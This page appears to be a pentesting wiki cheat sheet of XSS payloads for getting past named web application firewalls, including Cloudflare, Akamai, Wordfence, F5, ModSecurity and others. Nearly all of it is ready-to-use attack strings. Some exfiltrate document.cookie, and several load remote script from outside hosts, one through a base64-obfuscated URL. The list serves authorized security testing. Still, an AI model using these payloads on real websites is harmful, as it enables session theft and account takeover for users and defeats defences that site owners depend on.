✖️XSS WAF Bypass

XSS-protection bypass

<embed/:script allowscriptaccess=always src=example.com/x.js>

"onmouseover=alert(1)>

Cloudflare Bypass

<a"/onclick=(confirm)()>click
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>
<--`<img/src=` onerror=confirm``> --!>

Akamai bypass

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> //akamai ghost bypass
<d3v/onauxclick=[2].some(confirm)>click
<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>
?"></script><base%20c%3D=href%3Dhttps:\mysite>

Generic WAF Bypasses

<!" (without quotes) before: <!<script>alert(1)</script>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
BLOCKED <body/onload PASSED <body/onpageshow  BLOCKED =alert() PASSED =(alert)()

Notification.requestPermission(x=>{new(Notification)(1)})

<svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement('script')).src='//DOMAIN'
[base64 bypass firefox]: #with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)

[FINAL/src=brutelogic.com.br/2]: <svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=

MORE: Bypassing WAFs in Wild

Name: Wordfence
Payload: <a/href=javascript&colon;alert()>click

Name: Barracuda
Payload: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click

Name: Comodo
Payload: <d3v/onauxclick=(((confirm)))``>click

Name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click

Name: ModSecurity
Payload: <details/open/ontoggle=alert()>

Name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//

REFERENCES

PreviousGit Exposure NextXPath Injection

Last updated 1 year ago

Was this helpful?